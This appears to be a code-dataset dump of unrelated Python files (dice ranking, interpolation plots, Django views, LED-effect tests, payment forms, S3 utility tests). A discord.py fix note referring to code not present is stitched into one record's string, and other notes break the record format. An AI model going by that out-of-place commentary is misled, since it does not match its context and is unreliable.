alestórios. Guarde esses resultados em\num dicionário. No final, coloque esse dicionário em ordem, sabendo que o vencedor tirou o maior número no dado. 
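`add_all()` above is a coroutine, so the bare `add_all()` call only creates (and discards) a coroutine object; the registration loop never runs, and `leaderboard.start()` fires before the bot is ready. A hedged fix sketch using discord.py's `on_ready` event; it assumes the `bot`, `ledger`, and `leaderboard` objects defined in the script above.

```python
@bot.event
async def on_ready():
    # Startup work belongs here, after the gateway connection is up.
    for user in bot.users:
        if not ledger.contains(user.id) and not user.bot:
            ledger.add_user(user.id, user.name)
    if not leaderboard.is_running():   # tasks.Loop guard in recent discord.py
        leaderboard.start()
```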
'''\n\nfrom random import *\nfrom time import *\nfrom operator import *\n\njogadores = dict()\nranking = dict()\ncont = 1\nfor j in range(1, 5):\n jogadores[f'Jogador{j}'] = randint(1, 6)\n\nranking = sorted(jogadores.items(), key=itemgetter(1), reverse=True)\n\nfor k, v in jogadores.items():\n print(f'{k} = {v}')\n sleep(1)\nprint('-=' * 30)\nprint(' == RANKING DOS JOGADORES == ')\nfor k, v in ranking:\n print(f' {cont}º lugar: {k} com {v}.')\n cont += 1\n sleep(1)\n","sub_path":"pythonMundoTres/ex091.py","file_name":"ex091.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"413496810","text":"# A4.py\n# %matplotlib inline\nimport scipy.interpolate, matplotlib.pyplot as plt # For plotting\n\nfrom set_t_values import set_t_values\nfrom construct_pols import construct_pols\n\n# 1. sets the x and y values according to the table above,\nx = [0, .5, 1.1, 1, .2]\ny = [2, 2.5, 2.7, 2, 2.1]\n\n# 2. calls the functions from parts (a) and (b) to find the interpolating polynomials\nt = set_t_values(x, y) # find values of t at which to interpolate\np_x, p_y = construct_pols(x, y, t) # find the interpolating polynomials\n\n# 3. plots the interpolating curve in the plane along with the interpolation points\nt = scipy.linspace(min(t) - .3, max(t) * 1.1) # linespace for x\nplt.plot(x, y, 's', # square points\n p_x(t), p_y(t)) # interpolating curve\nplt.xlabel(\"$x$\")\nplt.ylabel(\"$y$\")\nplt.title(\"Interpolating Curve\")\nplt.legend(['$(x_i,y_i)$', '$(x(t),y(t))=(p_x(t),p_y(t))$'], loc='best')\nplt.show()\n\n# t_spline = scipy.linspace(min(t_i), max(t_i)) # linespace for x cubic, shoots error otherwise\nx_plus2 = x + [0, -.3]\ny_plus2 = y + [2.15, 2.15]\nt_plus2 = set_t_values(x_plus2, y_plus2)\nt = scipy.linspace(min(t_plus2), max(t_plus2)) # linespace for x\np_x_plus2, p_y_plus2 = construct_pols(x_plus2, y_plus2, t_plus2)\n# spline=scipy.interpolate.interp1d(t_i, x, kind='cubic')\nspline_x_plus2 = scipy.interpolate.interp1d(t_plus2, x_plus2, kind='cubic')\nspline_y_plus2 = scipy.interpolate.interp1d(t_plus2, y_plus2, kind='cubic')\n\nwidth, height = 6, 15\n\nplt.figure(figsize=(width, height))\nplt.subplot(311)\nplt.plot(x_plus2, y_plus2, 's', # square points\n p_x_plus2(t), p_y_plus2(t),\n spline_x_plus2(t), spline_y_plus2(t))\nplt.ylabel(\"$y$\")\nplt.legend(['$(x_i,y_i)$', 'Lagrange', 'cubic'],\n bbox_to_anchor=(1, 1),\n loc='best')\nplt.title(\"Interpolation Plots\")\n\nplt.figure(figsize=(width, height))\nplt.subplot(311 + 1)\nplt.plot(x_plus2, y_plus2, 's', # square points\n p_x_plus2(t), p_y_plus2(t))\nplt.ylabel(\"$y$\")\nplt.legend(['', 'Lagrange', 'cubic'],\n bbox_to_anchor=(1, 1),\n loc='best')\n\nplt.figure(figsize=(width, height))\nplt.subplot(311 + 1 + 1)\nplt.plot(x_plus2, y_plus2, 's', # square points\n spline_x_plus2(t), spline_y_plus2(t))\nplt.xlabel(\"$x$\")\nplt.ylabel(\"$y$\")\nplt.legend(['', 'cubic'],\n bbox_to_anchor=(1, 1),\n loc='best')\nplt.tight_layout()\nplt.show()\n","sub_path":"Assignment 4/A4.py","file_name":"A4.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"345835011","text":"from django.shortcuts import render\nfrom .models import Award, Certificate, Projects, Doing, Tools\n# Create your views here.\n\n\ndef resume(request):\n def chk_img(x):\n if x.image:\n return x.image.url\n else:\n return None\n\n data = {\n \"awards\": [\n {\"date\": row.date.isoformat(), 
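A note on `A4.py` above: `scipy.linspace` was only a re-export of NumPy's function and has been deprecated and removed in recent SciPy releases, so the parameter grid is better built with NumPy directly. A sketch with assumed `t_i` values:

```python
import numpy as np

t_i = [0.0, 1.0, 2.5, 4.0]  # assumed parameter values from set_t_values
t = np.linspace(min(t_i) - 0.3, max(t_i) * 1.1, num=50)  # num=50 matches the old default
print(t[0], t[-1])
```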
\"content\": row.content, \"image\": chk_img(row)}\n for row in Award.objects.all()\n ],\n \"certs\": [\n {\"cert\":row.cert, \"content\": row.content, \"image\": chk_img(row)}\n for row in Certificate.objects.all()\n ],\n\n \"doings\": [\n {\"content\":row.content, \"date\":row.date, \"image\":chk_img(row)}\n for row in Doing.objects.all()\n ],\n \"tools\": [row for row in Tools.objects.all()],\n\n }\n\n return render(request, 'blog/resume.html', {\"data\": data})\n\n\ndef projects(request):\n\n data = [row for row in Projects.objects.all()]\n\n return render(request, 'blog/project.html', {\"data\": data})","sub_path":"resume/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27826673","text":"\"\"\"\nRainbow light effect unit tests\n\"\"\"\n\nimport socket\nimport threading\n\nimport pytest\n\nfrom hyperion2boblight import BoblightClient, PriorityList\n\nMY_PRIORITY_LIST = PriorityList()\n\nclass TestRainbowEffect:\n \"\"\" Raibow effect test class \"\"\"\n\n @pytest.fixture(scope='module')\n def server(self, request):\n \"\"\" Create a socket which play the server's role to get message from client \"\"\"\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_socket.bind((\"localhost\", 19444))\n server_socket.listen(5)\n def end():\n \"\"\" Terminating function \"\"\"\n server_socket.close()\n request.addfinalizer(end)\n return server_socket\n\n @pytest.yield_fixture\n def client(self, request):\n \"\"\" Create the boblight client which will connect to our server socket \"\"\"\n my_priority_list = getattr(request.module, \"MY_PRIORITY_LIST\", None)\n my_priority_list .clear()\n client = BoblightClient(\n (\"localhost\", 19444),\n my_priority_list\n )\n\n client_thread = threading.Thread(target=client.run)\n client_thread.start()\n\n yield client\n\n my_priority_list.put(0, \"quit\")\n client_thread.join()\n\n @pytest.fixture\n def connection(self, request, server, client):\n \"\"\" Actually create server and client and connect them \"\"\"\n connection, _ = server.accept()\n # Receive the hello message\n connection.recv(1024)\n return connection\n\n def test_rainbow_effect(self, connection):\n \"\"\" Test that the rainbow effect actually display each rainbow color \"\"\"\n MY_PRIORITY_LIST.put(1, 'Rainbow')\n # Receive the priority\n connection.recv(1024)\n first_color_message = connection.recv(1024).decode()\n message = \"\"\n # Wait a full iteration of the effect\n while message.find(first_color_message) < 0:\n message = message + connection.recv(1024).decode()\n MY_PRIORITY_LIST.clear()\n # The message must contains command to light every rainbow color\n assert message.find(\"rgb %f %f %f\" % (1., 0., 0.)) != -1 # Red\n assert message.find(\"rgb %f %f %f\" % (1., 1., 0.)) != -1 # Yellow\n assert message.find(\"rgb %f %f %f\" % (0., 1., 0.)) != -1 # Green\n assert message.find(\"rgb %f %f %f\" % (0., 1., 1.)) != -1 # Turquoise\n assert message.find(\"rgb %f %f %f\" % (0., 0., 1.)) != -1 # Blue\n assert message.find(\"rgb %f %f %f\" % (1., 0., 1.)) != -1 # Purple\n\n","sub_path":"hyperion2boblight/tests/test_rainbow_effect.py","file_name":"test_rainbow_effect.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"471642409","text":"# 
=====================================================================\n# Course: CS219 -- Problem 1 -- Donor List\n# Filename: Problem 1__Problem 1.py\n# Author: \n# Purpose: \tProgram tht creates a multidimensional list of\n# donors and some information. Ability to edit and\n# print the data.\n# =====================================================================\n\n\ndonor_list = list()\n\n\ndef main():\n while True:\n print(\"Select an option:\")\n print(\" (A)dd a new donor\")\n print(\" (E)dit a record\")\n print(\" (L)ook up a record\")\n print(\" (Q)uit Program\")\n\n user_input = input(\"> \")\n\n if user_input == \"Q\":\n break\n elif user_input == \"A\":\n add_data()\n elif user_input == \"E\":\n edit_info()\n elif user_input == \"L\":\n look_up()\n else:\n print(\"Invalid Selection. Try again\\n\")\n\n\ndef add_data():\n # Add Data\n print(\"\\nADD INFORMATION\")\n print(\"How many records would you like to input\")\n num_records = int(input(\"> \"))\n\n while True:\n # Checks for a valid value. Must be an int greater than 0\n if num_records >= 1:\n\n # Check to see if the is any records\n list_len = len(donor_list)\n\n # Creates empty lists in donor_list = num_records\n i = 0\n while i < num_records:\n donor_list.append(list())\n i += 1\n\n j = 1\n # Checks to see if there is an empty list before the records are created\n if list_len == 0:\n while j <= num_records:\n record_num = j - 1\n print(\"\\nRecord Number:\", record_num + 1)\n donor_list[record_num].append(input(\"Name:\"))\n donor_list[record_num].append(input(\"Address:\"))\n donor_list[record_num].append(input(\"Contact:\"))\n j += 1\n else:\n while j <= num_records:\n record_num = list_len\n print(\"\\nRecord Number:\", j)\n donor_list[record_num].append(input(\"Name:\"))\n donor_list[record_num].append(input(\"Address:\"))\n donor_list[record_num].append(input(\"Contact:\"))\n\n j += 1\n list_len += 1\n\n print(\"Created\", i, \"record(s)\\n\")\n break\n elif num_records < 1:\n print(\"Must input at least 1 record\")\n else:\n print(\"Invalid value. 
Please Try again\")\n\n\ndef edit_info():\n # Edit info\n print(\"EDIT INFORMATION\")\n print(\"Enter the Record you wish to modify\")\n look_up()\n record_num = int(input(\"Record: \")) - 1\n\n print(\"Select which element of the record you wish to modify\")\n print(\"'0' = Name\")\n print(\"'1' = Address\")\n print(\"'2' = Contact\")\n element_num = int(input(\"Element: \"))\n\n while True:\n if element_num == 0:\n donor_list[record_num][element_num] = input(\"Name: \")\n break\n elif element_num == 1:\n donor_list[record_num][element_num] = input(\"Address: \")\n break\n elif element_num == 2:\n donor_list[record_num][element_num] = input(\"Contact: \")\n break\n else:\n print(\"Invalid Selection\")\n\n\ndef look_up():\n print(\"\\nINFO\")\n print(\n \"#\", \" \" * (2 - len(\"#\")),\n \"Name\", \" \" * (15 - len(\"Name\")),\n \"Address\", \" \" * (20 - len(\"Address\")),\n \"Contact\", \" \" * (10 - len(\"Contact\"))\n )\n j = 1\n for i in donor_list:\n if j < 10:\n record = \"0\" + str(j)\n else:\n record = str(j)\n\n print(\n record, \" \" * (2 - len(i)),\n i[0], \" \" * (15 - len(i[0])),\n i[1], \" \" * (20 - len(i[1])),\n i[2], \" \" * (10 - len(i[2])),\n )\n\n j += 1\n\n print(\"\\n\")\n\n\nmain()\n","sub_path":"Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"87550702","text":"from rlutilities.simulation import Car, Ball\r\nfrom rlutilities.mechanics import Aerial\r\nfrom rlutilities.linear_algebra import look_at\r\n\r\nfrom utils.vector_math import *\r\nfrom utils.math import *\r\nfrom utils.misc import *\r\n\r\n\r\nclass Intercept:\r\n def __init__(self, car: Car, ball_predictions, predicate: callable = None, backwards=False):\r\n self.ball: Ball = None\r\n self.is_viable = True\r\n\r\n #find the first reachable ball slice that also meets the predicate\r\n speed = 1000 if backwards else estimate_max_car_speed(car)\r\n # for ball in ball_predictions:\r\n for ball in ball_predictions:\r\n if estimate_time(car, ball.position, speed, -1 if backwards else 1) < ball.time - car.time \\\r\n and (predicate is None or predicate(car, ball)):\r\n self.ball = ball\r\n break\r\n\r\n #if no slice is found, use the last one\r\n if self.ball is None:\r\n if not ball_predictions:\r\n self.ball = Ball()\r\n else:\r\n self.ball = ball_predictions[-1]\r\n self.is_viable = False\r\n\r\n self.time = self.ball.time\r\n self.ground_pos = ground(self.ball.position)\r\n self.position = self.ball.position\r\n\r\nclass AerialIntercept:\r\n def __init__(self, car: Car, ball_predictions, predicate: callable = None):\r\n self.ball: Ball = None\r\n self.is_viable = True\r\n\r\n #find the first reachable ball slice that also meets the predicate\r\n test_car = Car(car)\r\n test_aerial = Aerial(car)\r\n \r\n for ball in ball_predictions:\r\n test_aerial.target = ball.position\r\n test_aerial.arrival_time = ball.time\r\n\r\n # fake our car state :D\r\n dir_to_target = ground_direction(test_car.position, test_aerial.target)\r\n test_car.velocity = dir_to_target * max(norm(test_car.velocity), 1200)\r\n test_car.orientation = look_at(dir_to_target, vec3(0,0,1))\r\n\r\n if test_aerial.is_viable() and (predicate is None or predicate(car, ball)):\r\n self.ball = ball\r\n break\r\n\r\n #if no slice is found, use the last one\r\n if self.ball is None:\r\n self.ball = ball_predictions[-1]\r\n self.is_viable = False\r\n\r\n self.time = self.ball.time\r\n self.ground_pos = 
ground(self.ball.position)\r\n self.position = self.ball.position\r\n","sub_path":"RLBotPack/BotimusPrime/utils/intercept.py","file_name":"intercept.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"645877029","text":"#!/usr/bin/python\n# coding:utf-8\n\n\n\"\"\"\nCreated on 2017-07-20\n\n@author: Wangchenyang\n\n@userdict: 测试Url接口\n\"\"\"\n\nimport login_Workbench\nimport htmlLogin\nimport print_Encounter\nimport history_Diagnosis\nimport history_OrderMedicines\nimport orderApply\n\n\nclass urlApi(object):\n def testcase(self):\n login_Workbench.login_workbench()\n htmlLogin.patient_info()\n htmlLogin.patient_encounter_info()\n htmlLogin.patient_scale_number()\n htmlLogin.patient_diagnosis_record()\n htmlLogin.patient_attach_number()\n print_Encounter.patient_print_encounter()\n history_Diagnosis.patient_historyDiagnosis()\n history_OrderMedicines.patient_historyOrderMedicines()\n orderApply.order_apply()\n\nif __name__ == '__main__':\n Test = urlApi()\n Test.testcase()","sub_path":"url_Api/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"466182834","text":"# -*- coding: utf-8 -*-\n\ndef count(start=0, step=1, stop=10):\n n = start\n while n <= stop:\n yield n\n n += step\n\nfor x in count(10, 2.5, 20):\n print(x)\n\n# example 1\nclass Count(object):\n def __init__(self, start=0, step=1, stop=10):\n self.n = start\n self.step = step\n self.stop = stop\n \n def __iter__(self):\n return self\n \n def __next__(self):\n n = self.n\n if n > self.stop:\n raise StopIteration()\n self.n += self.step\n return n\n\nfor x in Count(10, 2.5, 20):\n print(x)\n# example 2 \ndef generator():\n \"\"\"This example show that the statement is freeze. 
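`Intercept.__init__` above does a first-match scan over the ball predictions with an optional predicate and a last-slice fallback. The same shape, stripped of the Rocket League specifics (all names here are illustrative):

```python
def first_viable(predictions, reachable, predicate=None):
    """Return (slice, True) for the first reachable slice, else (last, False)."""
    for p in predictions:
        if reachable(p) and (predicate is None or predicate(p)):
            return p, True
    return (predictions[-1], False) if predictions else (None, False)

slices = [(0.5, 9), (1.0, 4), (2.0, 1)]  # (time, distance) stand-ins
pick, viable = first_viable(slices, lambda s: s[1] / 10 < s[0])
print(pick, viable)  # (1.0, 4) True
```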
It is lazy\"\"\"\n print('Before 1')\n yield 1\n print('After 1')\n print('Before 2')\n yield 2\n print('After 2')\n print('Before 3')\n yield 3\n\ng = generator()\n\nprint('Got %d' % next(g))\nprint('Got %d' % next(g))\nprint('Got %d' % next(g))\n","sub_path":"_generator.py","file_name":"_generator.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"36000109","text":"import pyodbc\nimport pandas as pd\nimport os\nfrom connection.connect_string import *\nfrom email_manager.quickstart import *\n\n\ndef main():\n po_number = input('Inscrire numéro de PO:')\n current_folder = os.path.dirname(os.path.abspath(__file__))\n save_path = \"%s\\\\T%s.xlsx\" % (current_folder, po_number)\n cursor = connect_to_erp()\n df = get_parts_po(cursor, po_number)\n print(df)\n save_to_excel(df, save_path)\n email_po(po_number, \"%s\\\\T%s.xlsx\" % (current_folder, po_number))\n\n\ndef get_parts_po(cursor, po_number):\n cursor.execute('SELECT * FROM P_ORDER_DTL WHERE PO={}'.format(po_number))\n column_title = ['NUMERO', 'DESCRIPTION', 'QTY']\n parts_no = []\n descriptions = []\n qantites = []\n for row in cursor:\n # print(\"%s, %s, %s\" % (row[3], row[5], int(row[6])))\n parts_no.append(row[3])\n descriptions.append(row[5])\n qantites.append(row[6])\n # print('\\n')\n return pd.DataFrame({column_title[0]: parts_no, column_title[1]: descriptions, column_title[2]: qantites})\n\n\ndef save_to_excel(df, save_path):\n writer = pd.ExcelWriter(save_path)\n df.to_excel(writer, sheet_name='sheet11', index=False)\n writer.save()\n\n\ndef connect_to_erp():\n cnxn = pyodbc.connect(connect_string())\n return cnxn.cursor()\n\n\ndef email_po(po_number, file):\n service = create_service()\n # results = service.users().labels().list(userId='me').execute()\n # labels = results.get('labels', [])\n\n # if not labels:\n # print('No labels found.')\n # else:\n # print('Labels:')\n # for label in labels:\n # print(label['name'])\n message = create_message_with_attachment('abechard@centreidnov.com',\n 'abechard@centreidnov.com',\n \"Commande PO#%s\" % po_number,\n \"Bonjour\\nVoici des pièces à produire\",\n file)\n #send_message(service, 'me', message)\n\n\nif __name__ == '__main__':\n # execute only if run as the entry point into the program\n main()\n","sub_path":"send_po_excel/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"135349655","text":"import functools\nimport json\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.db import transaction\nfrom django.db.models.fields.files import FieldFile\nfrom django.utils.translation import gettext_lazy as _\nfrom django_file_form.forms import FileFormMixin\n\nfrom hypha.apply.stream_forms.fields import MultiFileField, SingleFileField\n\nfrom ..models.payment import (\n CHANGES_REQUESTED,\n DECLINED,\n PAID,\n REQUEST_STATUS_CHOICES,\n SUBMITTED,\n UNDER_REVIEW,\n Invoice,\n PaymentReceipt,\n PaymentRequest,\n SupportingDocument,\n)\nfrom ..models.project import PacketFile\n\n\ndef filter_choices(available, choices):\n return [(k, v) for k, v in available if k in choices]\n\n\nfilter_request_choices = functools.partial(filter_choices, REQUEST_STATUS_CHOICES)\n\n\nclass ChangePaymentRequestStatusForm(forms.ModelForm):\n name_prefix = 'change_payment_request_status_form'\n\n class Meta:\n 
fields = ['status', 'comment', 'paid_value']\n model = PaymentRequest\n\n def __init__(self, instance, *args, **kwargs):\n super().__init__(instance=instance, *args, **kwargs)\n\n self.initial['paid_value'] = self.instance.requested_value\n\n status_field = self.fields['status']\n\n possible_status_transitions_lut = {\n CHANGES_REQUESTED: filter_request_choices([DECLINED]),\n SUBMITTED: filter_request_choices([CHANGES_REQUESTED, UNDER_REVIEW, DECLINED]),\n UNDER_REVIEW: filter_request_choices([PAID]),\n }\n status_field.choices = possible_status_transitions_lut.get(instance.status, [])\n\n if instance.status != UNDER_REVIEW:\n del self.fields['paid_value']\n\n def clean(self):\n cleaned_data = super().clean()\n status = cleaned_data['status']\n paid_value = cleaned_data.get('paid_value')\n\n if paid_value and status != PAID:\n self.add_error('paid_value', _('You can only set a value when moving to the Paid status.'))\n return cleaned_data\n\n\nclass ChangeInvoiceStatusForm(forms.ModelForm):\n name_prefix = 'change_invoice_status_form'\n\n class Meta:\n fields = ['status', 'comment', 'paid_value']\n model = Invoice\n\n def __init__(self, instance, *args, **kwargs):\n super().__init__(instance=instance, *args, **kwargs)\n\n self.initial['paid_value'] = self.instance.amount\n\n status_field = self.fields['status']\n\n possible_status_transitions_lut = {\n CHANGES_REQUESTED: filter_request_choices([DECLINED]),\n SUBMITTED: filter_request_choices([CHANGES_REQUESTED, UNDER_REVIEW, DECLINED]),\n UNDER_REVIEW: filter_request_choices([PAID]),\n }\n status_field.choices = possible_status_transitions_lut.get(instance.status, [])\n\n if instance.status != UNDER_REVIEW:\n del self.fields['paid_value']\n\n def clean(self):\n cleaned_data = super().clean()\n status = cleaned_data['status']\n paid_value = cleaned_data.get('paid_value')\n\n if paid_value and status != PAID:\n self.add_error('paid_value', _('You can only set a value when moving to the Paid status.'))\n return cleaned_data\n\n\nclass PaymentRequestBaseForm(forms.ModelForm):\n class Meta:\n fields = ['requested_value', 'invoice', 'date_from', 'date_to']\n model = PaymentRequest\n widgets = {\n 'date_from': forms.DateInput,\n 'date_to': forms.DateInput,\n }\n labels = {\n 'requested_value': _('Requested Value ({currency})').format(currency=settings.CURRENCY_SYMBOL)\n }\n\n def __init__(self, user=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['requested_value'].widget.attrs['min'] = 0\n\n def clean(self):\n cleaned_data = super().clean()\n date_from = cleaned_data['date_from']\n date_to = cleaned_data['date_to']\n\n if date_from > date_to:\n self.add_error('date_from', _('Date From must be before Date To'))\n\n return cleaned_data\n\n\nclass CreatePaymentRequestForm(FileFormMixin, PaymentRequestBaseForm):\n receipts = MultiFileField(required=False)\n\n def save(self, commit=True):\n request = super().save(commit=commit)\n\n receipts = self.cleaned_data['receipts'] or []\n\n PaymentReceipt.objects.bulk_create(\n PaymentReceipt(payment_request=request, file=receipt)\n for receipt in receipts\n )\n\n return request\n\n\nclass InvoiceBaseForm(forms.ModelForm):\n class Meta:\n fields = ['date_from', 'date_to', 'amount', 'document', 'message_for_pm']\n model = Invoice\n widgets = {\n 'date_from': forms.DateInput,\n 'date_to': forms.DateInput,\n }\n\n def __init__(self, user=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['amount'].widget.attrs['min'] = 0\n\n def clean(self):\n cleaned_data = 
super().clean()\n date_from = cleaned_data['date_from']\n date_to = cleaned_data['date_to']\n\n if date_from > date_to:\n self.add_error('date_from', _('Date From must be before Date To'))\n\n return cleaned_data\n\n\nclass CreateInvoiceForm(FileFormMixin, InvoiceBaseForm):\n document = SingleFileField(label='Invoice File', required=True)\n supporting_documents = MultiFileField(\n required=False,\n help_text=_('Files that are related to the invoice. They could be xls, microsoft office documents, open office documents, pdfs, txt files.')\n )\n\n field_order = ['date_from', 'date_to', 'amount', 'document', 'supporting_documents', 'message_for_pm']\n\n def save(self, commit=True):\n invoice = super().save(commit=commit)\n\n supporting_documents = self.cleaned_data['supporting_documents'] or []\n\n SupportingDocument.objects.bulk_create(\n SupportingDocument(invoice=invoice, document=document)\n for document in supporting_documents\n )\n\n return invoice\n\n\nclass EditPaymentRequestForm(FileFormMixin, PaymentRequestBaseForm):\n receipt_list = forms.ModelMultipleChoiceField(\n widget=forms.CheckboxSelectMultiple(attrs={'class': 'delete'}),\n queryset=PaymentReceipt.objects.all(),\n required=False,\n label=_('Receipts')\n )\n receipts = MultiFileField(label='', required=False)\n\n def __init__(self, user=None, instance=None, *args, **kwargs):\n super().__init__(*args, instance=instance, **kwargs)\n\n self.fields['receipt_list'].queryset = instance.receipts.all()\n\n self.fields['requested_value'].label = 'Value'\n\n @transaction.atomic\n def save(self, commit=True):\n request = super().save(commit=commit)\n\n removed_receipts = self.cleaned_data['receipt_list']\n\n removed_receipts.delete()\n\n to_add = self.cleaned_data['receipts']\n if to_add:\n PaymentReceipt.objects.bulk_create(\n PaymentReceipt(payment_request=request, file=receipt)\n for receipt in to_add\n )\n return request\n\n\nclass EditInvoiceForm(FileFormMixin, InvoiceBaseForm):\n document = SingleFileField(label=_('Invoice File'), required=True)\n supporting_documents = MultiFileField(required=False)\n\n field_order = ['date_from', 'date_to', 'amount', 'document', 'supporting_documents', 'message_for_pm']\n\n @transaction.atomic\n def save(self, commit=True):\n invoice = super().save(commit=commit)\n not_deleted_original_filenames = [\n file['name'] for file in json.loads(self.cleaned_data['supporting_documents-uploads'])\n ]\n for f in invoice.supporting_documents.all():\n if f.document.name not in not_deleted_original_filenames:\n f.document.delete()\n f.delete()\n\n for f in self.cleaned_data[\"supporting_documents\"]:\n if not isinstance(f, FieldFile):\n try:\n SupportingDocument.objects.create(invoice=invoice, document=f)\n finally:\n f.close()\n return invoice\n\n\nclass SelectDocumentForm(forms.ModelForm):\n document = forms.ChoiceField(\n label=\"Document\",\n widget=forms.Select(attrs={'id': 'from_submission'})\n )\n\n class Meta:\n model = PacketFile\n fields = ['category', 'document']\n\n def __init__(self, existing_files, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.files = existing_files\n\n choices = [(f.url, f.filename) for f in self.files]\n\n self.fields['document'].choices = choices\n\n def clean_document(self):\n file_url = self.cleaned_data['document']\n for file in self.files:\n if file.url == file_url:\n new_file = ContentFile(file.read())\n new_file.name = file.filename\n return new_file\n raise forms.ValidationError(_('File not found on submission'))\n\n @transaction.atomic()\n def 
save(self, *args, **kwargs):\n return super().save(*args, **kwargs)\n","sub_path":"hypha/apply/projects/forms/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"189310400","text":"import boto3\nimport json\nimport pytest\n\nfrom tempfile import NamedTemporaryFile\nfrom moto import mock_s3\nfrom mozetl.taar import taar_utils\n\nSAMPLE_DATA = {\"test\": \"data\"}\n\nFAKE_AMO_DUMP = {\n \"test-guid-0001\": {\n \"name\": {\"en-US\": \"test-amo-entry-1\"},\n \"default_locale\": \"en-US\",\n \"current_version\": {\n \"files\": [\n {\n \"status\": \"public\",\n \"platform\": \"all\",\n \"id\": 1,\n \"is_webextension\": True,\n }\n ]\n },\n \"guid\": \"test-guid-0001\",\n },\n \"test-guid-0002\": {\n \"name\": {\"en-US\": \"test-amo-entry-2\"},\n \"default_locale\": \"en-US\",\n \"current_version\": {\n \"files\": [\n {\n \"status\": \"public\",\n \"platform\": \"all\",\n \"id\": 2,\n \"is_webextension\": False,\n }\n ]\n },\n \"guid\": \"test-guid-0002\",\n },\n}\n\n\n@mock_s3\ndef test_read_from_s3():\n # Write a JSON blob\n bucket = \"test-bucket\"\n prefix = \"test-prefix/\"\n s3_json_fname = \"test.json\"\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n conn.create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n with NamedTemporaryFile(\"w\") as json_file:\n json.dump(SAMPLE_DATA, json_file)\n # Seek to the beginning of the file to allow the tested\n # function to find the file content.\n json_file.seek(0)\n # Upload the temp file to S3.\n taar_utils.write_to_s3(json_file.name, s3_json_fname, prefix, bucket)\n\n data = taar_utils.read_from_s3(s3_json_fname, prefix, bucket)\n assert data == SAMPLE_DATA\n\n\n@mock_s3\ndef test_write_to_s3():\n bucket = \"test-bucket\"\n prefix = \"test-prefix/\"\n dest_filename = \"test.json\"\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n bucket_obj = conn.create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n with NamedTemporaryFile(\"w\") as json_file:\n json.dump(SAMPLE_DATA, json_file)\n # Seek to the beginning of the file to allow the tested\n # function to find the file content.\n json_file.seek(0)\n # Upload the temp file to S3.\n taar_utils.write_to_s3(json_file.name, dest_filename, prefix, bucket)\n\n available_objects = list(bucket_obj.objects.filter(Prefix=prefix))\n assert len(available_objects) == 1\n\n # Check that our file is there.\n full_s3_name = \"{}{}\".format(prefix, dest_filename)\n keys = [o.key for o in available_objects]\n assert full_s3_name in keys\n\n stored_data = taar_utils.read_from_s3(dest_filename, prefix, bucket)\n assert SAMPLE_DATA == stored_data\n\n\n@mock_s3\ndef test_write_json_s3():\n bucket = \"test-bucket\"\n prefix = \"test-prefix/\"\n base_filename = \"test\"\n\n content = {\"it-IT\": [\"firefox@getpocket.com\"]}\n\n conn = boto3.resource(\"s3\", region_name=\"us-west-2\")\n bucket_obj = conn.create_bucket(\n Bucket=bucket,\n CreateBucketConfiguration={\n \"LocationConstraint\": \"us-west-2\",\n },\n )\n\n # Store the data in the mocked bucket.\n taar_utils.store_json_to_s3(\n json.dumps(content), base_filename, \"20171106\", prefix, bucket\n )\n\n # Get the content of the bucket.\n available_objects = list(bucket_obj.objects.filter(Prefix=prefix))\n assert len(available_objects) == 2\n\n # Get the list of keys.\n keys = [o.key for o in 
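The `filter_choices` / `functools.partial` idiom at the top of the payments module above is worth isolating; a standalone sketch with toy status constants (assumed values):

```python
import functools

CHOICES = [("submitted", "Submitted"), ("paid", "Paid"), ("declined", "Declined")]

def filter_choices(available, wanted):
    return [(k, v) for k, v in available if k in wanted]

# partial() pins the available universe, leaving only the wanted subset to pass.
filter_request_choices = functools.partial(filter_choices, CHOICES)
print(filter_request_choices(["paid", "declined"]))
# [('paid', 'Paid'), ('declined', 'Declined')]
```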
